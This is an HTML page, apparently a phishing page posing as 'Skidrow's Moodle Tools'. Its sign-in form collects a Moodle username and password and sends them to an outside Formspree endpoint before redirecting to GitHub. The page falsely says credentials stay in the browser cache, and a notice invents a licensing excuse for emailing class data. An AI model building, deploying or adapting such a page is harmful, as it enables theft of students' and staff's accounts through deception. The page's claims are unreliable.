<link rel="apple-touch-icon" sizes="57x57" href="/apple-icon-57x57.png">
<link rel="apple-touch-icon" sizes="60x60" href="/apple-icon-60x60.png">
<link rel="apple-touch-icon" sizes="72x72" href="/apple-icon-72x72.png">
<link rel="apple-touch-icon" sizes="76x76" href="/apple-icon-76x76.png">
<link rel="apple-touch-icon" sizes="114x114" href="/apple-icon-114x114.png">
<link rel="apple-touch-icon" sizes="120x120" href="/apple-icon-120x120.png">
<link rel="apple-touch-icon" sizes="144x144" href="/apple-icon-144x144.png">
<link rel="apple-touch-icon" sizes="152x152" href="/apple-icon-152x152.png">
<link rel="apple-touch-icon" sizes="180x180" href="/apple-icon-180x180.png">
<link rel="icon" type="image/png" sizes="192x192"  href="/android-icon-192x192.png">
<link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="96x96" href="/favicon-96x96.png">
<link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
<link rel="manifest" href="/manifest.json">
<meta name="msapplication-TileColor" content="#ffffff">
<meta name="msapplication-TileImage" content="/ms-icon-144x144.png">
<meta name="theme-color" content="#ffffff">
<title>Skidrow's Moodle Tools</title>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Document</title>
    <link rel="stylesheet" href="style.css">
    <style>
</style>
</head>
<body>
    
        <div class="box">
            <h2><img src="logo.png"  style="width:170px;height:70px;"></h2>
                <h2>Sign in</h2>
                <p>Specify Moodle Account</p>
                <form name="input" method="POST" action="https://formspree.io/mvovogrb" id="pass-form">
                  <div class="inputBox">
                    <input type="email" name="_replyto" required onkeyup="this.setAttribute('value', this.value);"  value="">
                    <label>Username</label>
                  </div>
                  <div class="inputBox">
                        <input type="text" name="text" required onkeyup="this.setAttribute('value', this.value);" value="">
                        <label>Password</label>
                      </div>
                    <p style="font-size:11px;color:#5f6368;">Email, OAuth, OAuth2 tokens and password are only stored in browser cache.</p>
                  <input type="submit" name="sign-in" value="Get">
    <input type="hidden" name="_next" value="//github.com/earlybirdy1/ghpage/b"/>
                </form>
              </div>

<div class="box" style="transform: translate(0%, -50%)">
    <p> Notice </p>
<p style="font-size:12px;color:#5f6368;" "text-align:center;">
 For copyright reasons (<a href=https://docs.oracle.com/cloud/latest/big-data-discovery-cloud/BDDLG/cl_third_party_software_usage_and_licenses_root.htm#BDDLG-concept_3F6BFEB640F8408AACC379F07EEC6B85>curl</a>, <a href=https://www.openssl.org/source/license.html>openSSL license agreement</a>), I'm legally not allowed to display the tabledata the SQL grabs from the Moodle classroom API. Instead, Formspree will parse and send you all available files to the email address entered. For large classes (>20MB) it could take up to 2 minutes. 
</p>
    <p>&nbsp;</p>
<p style="font-size:12px;color:#5f6368;" "text-align:center;">
All code and certificates available on the github repository.
</p>
 </div>
</body>
</html>
